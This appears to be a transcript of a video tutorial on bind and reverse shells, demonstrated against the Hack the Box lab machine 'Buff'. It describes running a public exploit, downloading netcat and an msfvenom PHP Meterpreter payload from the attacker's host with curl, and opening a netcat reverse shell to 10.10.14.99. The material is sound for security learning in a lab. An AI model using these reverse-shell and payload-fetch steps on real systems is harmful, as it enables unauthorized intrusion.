and thank you for viewing my channel. I know it's been a year since I posted my last video. Um, I'm taking a different approach with this channel where I'll explore concepts instead of just solving capture the flag challenges. I've noticed there's a plethora of videos where they just solve the capture the flag challenge, and I don't think that's really helpful in learning security concepts. Um, so I'm going to try to take a deep dive into each topic, and I'll use Hack the Box to help show that. So like in today's video, I'll be using Buff to explain shells. But this isn't a capture the flag solution. IPPSec and there's a plethora of resources online that will basically show you how to solve these boxes. So with that, let's take a look at shells. And to start off with shells, there's really two different types of shells. There's bind shells and then reverse shells, right? So let's say that we have two machines. This is our client. This is our victim, right? Slash client. And then we have a server slash attacking machine, right? So a bind shell would basically be traffic going from the server to the client. So how does that look? Basically, there would be a listener that we would set up on the victim, right? And we're just going to tell it, hey, we expect a bin bash shell to be spawned when this is connected to. So we basically set up a malicious service on the victim, and then we connect to it from our attacking machine, right? And now, who am I? I'm Callie, right? I've connected to the victim. And that's great if we don't have firewalls. But let's say that, we have a firewall. Let's say that IPP tables is set to drop all incoming traffic. I'm not going to run this because it's not going to work either way because I'm doing this all on the same machine. But let's just say that incoming traffic's blocked, but outgoing traffic isn't blocked. In that case, we could set up a reverse shell, and that's where we would basically set up a listener, and then we tell our victim to, instead of listen, connect to our attacking machine, right? And which in this case is the same machine. So who am I? I'm Callie. So that in a nutshell is like bind shells and reverse shells. There is one other thing that I want to discuss, and that is like services running with privileges. And let's say that, okay, again, we'll use a bind shell, right? And let's say that we just got this service running as root, right? So if we have this service running as root, and then we connect to it using our, bind shell, who am I? I'm root, right? So that's why it's important to make sure that you aren't running services with higher privileges. That's why, like, if you go into Kali and you say sudo su, right, it gives you like this death symbol. Like they don't want you operating as that because if you spin up a listener or something like that during a capture the flag challenge, all they have to do is basically connect and they automatically have root access. So that is kind of a brief crash course on shells. Um, I now want to kind of focus, and I'm going to talk a little bit about exploits, but we'll get back to shells here in a second. So let's say that in this case we have buff, right, on Hack the Box. Let's close that. Let's go ahead and open buff. Okay, so we got this website, right? And okay, proxy servers refusing settings. So let's go ahead and spin up burp because that's going to kind of be helpful in case we need to look at traffic going back and forth, like basically your post and get requests. Okay, so starting up, I apologize. There we go, intercept. We'll set intercept off. Okay, so basically the reason why I got that was because I have my settings and I have my proxy on. Okay. Yeah, so if I just go to burp, and IPPSec goes over this well, but let's say we got this website and we can see the traffic in burp, and like here we see project roles NI and we do some exploring, and we see that it's made by Gym Management Software, right? So in IPPSec, um, we'd basically do search exploit, and you could just say Gym Management, and then yeah, this would be this exploit here, right? So let's say that you got this exploit, and then again, this is all kind of shown by IPPSec, but this exploit basically all it does is modifies like a get request, and it basically sets up a dumb shell, and I'll show you what I mean by dumb shell here. So like, yeah, these aren't important. These two functions aren't important. This is where all the meat happens, and then we basically are feeding it through our proxy. So we're setting up proxies, a dictionary of proxies, and then in the get request, if you go to like W3 schools, you'll see that there's an option for proxies. So like over here, and that's basically what we're doing is we're sending each get and post request through our proxy so we can kind of see what this exploit does. So here, and then in IPPSec, he updates this to request. So why don't I just open that? And then we'll basically, bear with me here, get a shell, a dumb shell. Okay, so open this, open this. We'll go ahead and modify this exploit. Doo-doo-doo. Where you at? There you are. Request, file, save. And then, yeah, we'll just leave that open. And then let's go ahead and actually turn intercept on and then capture these requests. Okay, so this exploit is kind of enough to kind of tell us where it's been tested on. So it was tested using Python 2.7. There are exploits out there that, they just basically give you the code and they expect you to interpret what's going on. Oh, why'd that happen? Split terminal horizontally. There we go. Okay, so let's go Gym or Python 2.7, and I've already ran this exploit, and it's because it isn't in that current directory. Okay, so let's go Gym dot oh, Python 2.7 gym.py, and here we can kind of see all the requests getting sent through our burp, right? And then let's say, okay, so here's basically the payload that we're creating, and we could basically intercept the response to this, and then we see that that's a 200 OK, 200 OK, so we should have a shell, fingers crossed, and we do. Okay, so great, we ran an exploit and we got a shell. And we can say who am I /all, and this is going to get annoying, so Let's go ahead and turn off intercept. And we can basically look for, we got a basic shell. We could look for SE impersonate token to see if we can do a rotten potato exploit, privilege escalation. Um, we're just a basic user, Sean, and that's great. But let's see if we can change directory. So let's go to C:// right? Well, this hasn't changed, and that kind of makes sense because when you look at this exploit and you look at these two definitions, it basically is just it's basically just a static like pointer, right? It's not actually reflecting the directory it's in. Okay, so let's see if we can truly change directories. And it looks like we can. Um, so yeah, we can read from directories, right? We can read from, you know, maybe another directory, but we can't actually change directory. And furthermore, if we try to tab complete, um, yeah, see, this is what we call a dumb shell. Basically, there's no history. You can't go up, you can't go down. Um, this shell is stupid. So how do we get it to where we have a fully interactive shell, right? Well, if this was a Linux box, and let's say that we had Python, so we could say where Python, or it wouldn't even have to be a Linux box. Let's just look for Python. We could upgrade it, and I will post an article on how to do that. Um, but basically, you just follow these steps here. You would like okay, so here you'd echo strterm stty to get your rows and columns, and then you do stty raw echo, and then basically put it as a foreground and then reset it. Okay, I'm sorry, I'm getting ahead of myself. So before even doing that, if you had Python, you'd basically run this command, right? Python taxi, and then you could import like a module for a shell, and then you could basically use that shell. Um, I'm not making any sense. I apologize for that, but basically there's a way to upgrade to a fully interactive shell in Linux, and I think I should probably do a separate video for that. Let's just focus on Windows for now. Okay, so we don't have a fully interactive shell, right? So how do we get that? Um, well, there's a few ways to do that. Um, let's look at the easiest way, right? So let's look at our netcat example. Okay, and let's go to a folder www, and then let's say that I locate nc.exe, and I use this Windows binary to basically help get a fully interactive shell. So I already copied that into this directory, and let's go ahead and remove these guys. Okay, so I already copied netcat. Since we're on a Windows machine, we could use PowerShell download string to download it, and then we could just use a Python server. So like Python 3, basically start a Python server, and then use it using PowerShell download string. Because being this is a Windows box, it almost definitely has PowerShell. But let's see if we have curl, and we do. Okay, so let's go ahead and try to download that file using curl. So I'll put in my IP, and then c.exe, and then we'll go out and c.exe. Okay, looks like we got a connection, and if I do dir, there's nc.exe. Great. So now using our reverse shell concept, I could basically set up a listener, and actually let's use rlwrap. So rlwrap will allow us to basically call command or call history, and I'll show you what I mean here. So if I do rlwrap, and then set up a listener. And then if I say nc tact nv 10 10 14 9 9968, and then we'll just say execute cmd.exe, I get a connection, and now I have a fully interactive shell. So what RL wrap will allow me to do, let's say ipconfig, is that it'll allow me to basically arrow up and then call the history. If I didn't use RL wrap, I wouldn't have this ability. Still don't have tab complete, but it's a lot more interactive, and now I can go C:/ right, and now I'm in the C directory. So now I have a more interactive shell basically. Okay, so that's great. We can do that. But like I said, almost every Windows machine is going to have PowerShell. So let's go ahead and try to use PowerShell to connect to my interactive session, and then I would get PowerShell commands. I could also technically just drop into PowerShell um, just from that last shell, but just to see that it works. Okay, so now I got PowerShell. So now I can say something like get computer info, and now all the computer info should be displayed soon. Just a few more seconds. Okay, this is taking a while, so I might need to pause the video. Okay, sorry about that. That took quite a while. But the command eventually ran, and we can see that this is a Windows 10 Enterprise, that it's 64-bit. And yeah, so basically now we have PowerShell commands. And like I said, I could have done this off of the last session with just Netcat by just doing, you know, I think if I just say PowerShell, it'll probably launch me in another shell. Yep, it just launched me in another shell. Now I'm going to have to enter exit twice because I basically took that session and then spun up another shell session. So let's go exit, and then I'll have to hit exit again to basically exit out of the shell. So that's great. And then, yeah, this shell, like I said, it's stupid. It doesn't even have an exit command, so I have to go Control C to basically stop it. Okay, so that is kind of the premises of shells. There is one last thing that I want to show, and I think, let's see, if I go Python 2.7, okay, just launch that exploit again. Meterpreter sessions. I love meterpreter sessions. To me, they are the holy grail of shells, right? Like there's so much more you can do with a meterpreter session, and then you don't even have to actually drop into the shell, so they're a little bit more stealthy. And then you also have the option of like staged and non-staged payloads, right? So we're going to kind of delve a little bit into payloads later, but basically if we go MSF Venom, and then let's say that we want to generate a payload, and let's say since this site uses PHP, and we can tell that by this extension here, let's go ahead and look at a PHP. And yes, I did cheat, and I tried this before. And I'll warn you, this isn't going to be a persistent meterpreter session. I haven't been able to get this to work, but it will launch a meterpreter session, and you'll be able to see a few commands. So let's go ahead and generate this payload. And then let's go ahead and set up our Python web server. And let's go ahead and grab that payload, right? So I don't, yeah, this is a totally new, I reset this box before I started this video. So let's go curl HTTP, go to our attacking machine, and then shell.php. Oops, I forgot to specify the out. Yep, now I'm going to get a bunch of garbage. Okay. Or it's not garbage, it's a request. But we can see that basically this PHP file is not in there. So let's go curl HTTP. Come, what? 9 shell.php. And then let's just save it as shell.php. Okay, so that get request worked. And if I go dir, there's our shell.php, right? And from the exploit, we can see this Kamehameha, I think that's a Dragon Ball Z reference, PHP file in this directory. So like here, we could basically go Kamehameha May. I don't know if this is correct. It didn't find it, but if we go to shell.php, oh, it's because we gotta go to uploads. I think I'm misspelling that, but let's go ahead and start a multi-handler, right, through MSF console. So if we go sudo msfdb start, okay, looks like we already started it. Um, there's a nice quick command for starting the multi-handler, and it's this guy. And we're going to want to make sure that we set our payload correctly. So let's look at our payload, and let's grab him, and then let's go down to here. And this is just a nice one-liner for starting MSF console. And we'll go more into this later, but basically -q for quiet, and I think -x is execute. And then you basically just supply it the command. So like use multi-handler, set the payload, set our host, set our port, and then run. So we'll wait for that to start up. Okay, so it looks like our TCP handler started up. And then if we go to, basically we could do this using curl as well, but if we go to our uploads and then say like shell.php, or is it upload? Where do I go? Okay, that looks like that Hun, that's promising. Okay, and yeah, here we have an interpreter session. So now we could run get UID, and that works, and everything's fine until we drop into a shell. And then, sure, we get the shell, but we go C:/, it hangs. And I haven't figured out why. So, um, yeah, that's kind of basically a run through of shells. I know this video has gotten quite long, and I know I kind of blundered the upgrading a TTY shell. So I'll basically post this article. This is a great reference for upgrading shells using Python. Um, And I promise I'll show this sometime using a Linux box. But with that, I think I'll end the video and appreciate all feedback. Thanks for watching, and I hope you have a great rest of your day.